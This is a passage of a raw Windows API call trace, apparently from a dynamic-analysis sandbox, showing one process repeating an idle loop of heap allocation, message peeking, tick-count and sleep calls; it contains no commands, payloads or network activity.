[0063.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.599] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.599] GetTickCount () returned 0x1c725 [0063.599] GetTickCount () returned 0x1c725 [0063.599] GetTickCount () returned 0x1c725 [0063.599] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.599] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.599] GetTickCount () returned 0x1c725 [0063.599] Sleep (dwMilliseconds=0x0) [0063.614] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.614] GetLastError () returned 0x0 [0063.614] GetCurrentProcessId () returned 0xa44 [0063.614] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.614] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.614] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.614] GetTickCount () returned 0x1c734 [0063.615] GetTickCount () returned 0x1c734 [0063.615] GetTickCount () returned 0x1c734 [0063.615] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.615] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.615] GetTickCount () returned 0x1c734 [0063.615] Sleep (dwMilliseconds=0x0) [0063.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.661] GetLastError () returned 0x0 [0063.661] GetCurrentProcessId () returned 0xa44 [0063.661] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.661] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.661] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.661] GetTickCount () returned 0x1c763 [0063.661] GetTickCount () returned 0x1c763 [0063.661] GetTickCount () returned 0x1c763 [0063.661] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.661] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.661] GetTickCount () returned 0x1c763 [0063.661] Sleep (dwMilliseconds=0x0) [0063.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.692] GetLastError () returned 0x0 [0063.692] GetCurrentProcessId () returned 0xa44 [0063.692] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.692] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.692] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.692] GetTickCount () returned 0x1c782 [0063.693] GetTickCount () returned 0x1c782 [0063.693] GetTickCount () returned 0x1c782 [0063.693] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.693] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.693] GetTickCount () returned 0x1c782 [0063.693] Sleep (dwMilliseconds=0x0) [0063.723] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.739] GetLastError () returned 0x0 [0063.739] GetCurrentProcessId () returned 0xa44 [0063.739] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.739] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.739] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.739] GetTickCount () returned 0x1c7b1 [0063.739] GetTickCount () returned 0x1c7b1 [0063.739] GetTickCount () returned 0x1c7b1 [0063.739] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.739] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.739] GetTickCount () returned 0x1c7b1 [0063.739] Sleep (dwMilliseconds=0x0) [0063.754] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.770] GetLastError () returned 0x0 [0063.770] GetCurrentProcessId () returned 0xa44 [0063.770] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.770] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.770] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.770] GetTickCount () returned 0x1c7d0 [0063.770] GetTickCount () returned 0x1c7d0 [0063.770] GetTickCount () returned 0x1c7d0 [0063.770] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.770] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.770] GetTickCount () returned 0x1c7d0 [0063.771] Sleep (dwMilliseconds=0x0) [0063.786] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.801] GetLastError () returned 0x0 [0063.802] GetCurrentProcessId () returned 0xa44 [0063.802] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.802] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.802] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.802] GetTickCount () returned 0x1c7ef [0063.802] GetTickCount () returned 0x1c7ef [0063.802] GetTickCount () returned 0x1c7ef [0063.802] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.802] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.802] GetTickCount () returned 0x1c7ef [0063.802] Sleep (dwMilliseconds=0x0) [0063.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.848] GetLastError () returned 0x0 [0063.848] GetCurrentProcessId () returned 0xa44 [0063.848] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.848] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.848] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.848] GetTickCount () returned 0x1c81e [0063.848] GetTickCount () returned 0x1c81e [0063.848] GetTickCount () returned 0x1c81e [0063.848] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.848] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.849] GetTickCount () returned 0x1c81e [0063.849] Sleep (dwMilliseconds=0x0) [0063.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.868] GetLastError () returned 0x0 [0063.868] GetCurrentProcessId () returned 0xa44 [0063.868] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.868] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.868] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.868] GetTickCount () returned 0x1c82e [0063.868] GetTickCount () returned 0x1c82e [0063.868] GetTickCount () returned 0x1c82e [0063.869] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.869] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.869] GetTickCount () returned 0x1c82e [0063.869] Sleep (dwMilliseconds=0x0) [0063.879] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.911] GetLastError () returned 0x0 [0063.911] GetCurrentProcessId () returned 0xa44 [0063.911] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.911] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.911] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.911] GetTickCount () returned 0x1c85d [0063.911] GetTickCount () returned 0x1c85d [0063.911] GetTickCount () returned 0x1c85d [0063.911] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.911] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.911] GetTickCount () returned 0x1c85d [0063.911] Sleep (dwMilliseconds=0x0) [0063.927] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.927] GetLastError () returned 0x0 [0063.927] GetCurrentProcessId () returned 0xa44 [0063.927] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.927] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.927] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.927] GetTickCount () returned 0x1c86c [0063.927] GetTickCount () returned 0x1c86c [0063.927] GetTickCount () returned 0x1c86c [0063.927] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.927] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.927] GetTickCount () returned 0x1c86c [0063.928] Sleep (dwMilliseconds=0x0) [0063.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.957] GetLastError () returned 0x0 [0063.957] GetCurrentProcessId () returned 0xa44 [0063.957] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.957] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.957] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.957] GetTickCount () returned 0x1c88b [0063.957] GetTickCount () returned 0x1c88b [0063.958] GetTickCount () returned 0x1c88b [0063.958] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.958] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.958] GetTickCount () returned 0x1c88b [0063.958] Sleep (dwMilliseconds=0x0) [0063.974] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0063.990] GetLastError () returned 0x0 [0063.991] GetCurrentProcessId () returned 0xa44 [0063.991] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0063.991] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0063.991] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0063.991] GetTickCount () returned 0x1c8ab [0063.991] GetTickCount () returned 0x1c8ab [0063.991] GetTickCount () returned 0x1c8ab [0063.991] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0063.991] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0063.991] GetTickCount () returned 0x1c8ab [0063.991] Sleep (dwMilliseconds=0x0) [0064.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.036] GetLastError () returned 0x0 [0064.036] GetCurrentProcessId () returned 0xa44 [0064.036] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.036] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.036] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.036] GetTickCount () returned 0x1c8d9 [0064.036] GetTickCount () returned 0x1c8d9 [0064.036] GetTickCount () returned 0x1c8d9 [0064.036] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.036] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.036] GetTickCount () returned 0x1c8d9 [0064.036] Sleep (dwMilliseconds=0x0) [0064.051] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.051] GetLastError () returned 0x0 [0064.051] GetCurrentProcessId () returned 0xa44 [0064.051] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.051] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.051] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.051] GetTickCount () returned 0x1c8e9 [0064.051] GetTickCount () returned 0x1c8e9 [0064.051] GetTickCount () returned 0x1c8e9 [0064.051] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.051] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.051] GetTickCount () returned 0x1c8e9 [0064.052] Sleep (dwMilliseconds=0x0) [0064.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.096] GetLastError () returned 0x0 [0064.096] GetCurrentProcessId () returned 0xa44 [0064.096] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.096] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.096] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.096] GetTickCount () returned 0x1c908 [0064.096] GetTickCount () returned 0x1c908 [0064.096] GetTickCount () returned 0x1c908 [0064.096] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.096] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.096] GetTickCount () returned 0x1c908 [0064.096] Sleep (dwMilliseconds=0x0) [0064.097] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.097] GetLastError () returned 0x0 [0064.097] GetCurrentProcessId () returned 0xa44 [0064.097] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.097] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.097] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.097] GetTickCount () returned 0x1c908 [0064.097] GetTickCount () returned 0x1c908 [0064.097] GetTickCount () returned 0x1c908 [0064.097] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.097] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.098] GetTickCount () returned 0x1c918 [0064.098] Sleep (dwMilliseconds=0x0) [0064.113] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.129] GetLastError () returned 0x0 [0064.129] GetCurrentProcessId () returned 0xa44 [0064.129] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.129] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.129] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.129] GetTickCount () returned 0x1c937 [0064.129] GetTickCount () returned 0x1c937 [0064.129] GetTickCount () returned 0x1c937 [0064.129] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.129] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.129] GetTickCount () returned 0x1c937 [0064.129] Sleep (dwMilliseconds=0x0) [0064.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.160] GetLastError () returned 0x0 [0064.160] GetCurrentProcessId () returned 0xa44 [0064.160] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.160] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.160] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.160] GetTickCount () returned 0x1c956 [0064.161] GetTickCount () returned 0x1c956 [0064.161] GetTickCount () returned 0x1c956 [0064.161] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.161] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.161] GetTickCount () returned 0x1c956 [0064.161] Sleep (dwMilliseconds=0x0) [0064.176] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.191] GetLastError () returned 0x0 [0064.191] GetCurrentProcessId () returned 0xa44 [0064.191] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.191] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.191] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.192] GetTickCount () returned 0x1c975 [0064.192] GetTickCount () returned 0x1c975 [0064.192] GetTickCount () returned 0x1c975 [0064.192] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.192] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.192] GetTickCount () returned 0x1c975 [0064.192] Sleep (dwMilliseconds=0x0) [0064.200] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.222] GetLastError () returned 0x0 [0064.222] GetCurrentProcessId () returned 0xa44 [0064.223] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.223] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.223] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.223] GetTickCount () returned 0x1c995 [0064.223] GetTickCount () returned 0x1c995 [0064.223] GetTickCount () returned 0x1c995 [0064.223] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.223] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.223] GetTickCount () returned 0x1c995 [0064.223] Sleep (dwMilliseconds=0x0) [0064.238] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.254] GetLastError () returned 0x0 [0064.254] GetCurrentProcessId () returned 0xa44 [0064.254] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.254] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.254] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.254] GetTickCount () returned 0x1c9b4 [0064.254] GetTickCount () returned 0x1c9b4 [0064.254] GetTickCount () returned 0x1c9b4 [0064.254] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.254] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.254] GetTickCount () returned 0x1c9b4 [0064.254] Sleep (dwMilliseconds=0x0) [0064.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.300] GetLastError () returned 0x0 [0064.301] GetCurrentProcessId () returned 0xa44 [0064.301] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.301] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.301] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.301] GetTickCount () returned 0x1c9e3 [0064.301] GetTickCount () returned 0x1c9e3 [0064.301] GetTickCount () returned 0x1c9e3 [0064.301] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.301] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.301] GetTickCount () returned 0x1c9e3 [0064.301] Sleep (dwMilliseconds=0x0) [0064.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.332] GetLastError () returned 0x0 [0064.332] GetCurrentProcessId () returned 0xa44 [0064.332] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.332] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.332] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.332] GetTickCount () returned 0x1ca02 [0064.332] GetTickCount () returned 0x1ca02 [0064.332] GetTickCount () returned 0x1ca02 [0064.332] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.332] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.332] GetTickCount () returned 0x1ca02 [0064.332] Sleep (dwMilliseconds=0x0) [0064.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.364] GetLastError () returned 0x0 [0064.364] GetCurrentProcessId () returned 0xa44 [0064.364] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.364] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.364] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.364] GetTickCount () returned 0x1ca21 [0064.364] GetTickCount () returned 0x1ca21 [0064.364] GetTickCount () returned 0x1ca21 [0064.364] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.364] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.364] GetTickCount () returned 0x1ca21 [0064.364] Sleep (dwMilliseconds=0x0) [0064.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.394] GetLastError () returned 0x0 [0064.394] GetCurrentProcessId () returned 0xa44 [0064.394] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.394] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.394] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.394] GetTickCount () returned 0x1ca40 [0064.394] GetTickCount () returned 0x1ca40 [0064.395] GetTickCount () returned 0x1ca40 [0064.395] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.395] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.395] GetTickCount () returned 0x1ca40 [0064.395] Sleep (dwMilliseconds=0x0) [0064.410] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.425] GetLastError () returned 0x0 [0064.425] GetCurrentProcessId () returned 0xa44 [0064.425] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.425] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.425] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.425] GetTickCount () returned 0x1ca5f [0064.425] GetTickCount () returned 0x1ca5f [0064.426] GetTickCount () returned 0x1ca5f [0064.426] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.426] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.426] GetTickCount () returned 0x1ca5f [0064.426] Sleep (dwMilliseconds=0x0) [0064.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.472] GetLastError () returned 0x0 [0064.472] GetCurrentProcessId () returned 0xa44 [0064.472] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.472] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.473] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.473] GetTickCount () returned 0x1ca8e [0064.473] GetTickCount () returned 0x1ca8e [0064.473] GetTickCount () returned 0x1ca8e [0064.473] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.473] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.473] GetTickCount () returned 0x1ca8e [0064.473] Sleep (dwMilliseconds=0x0) [0064.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.503] GetLastError () returned 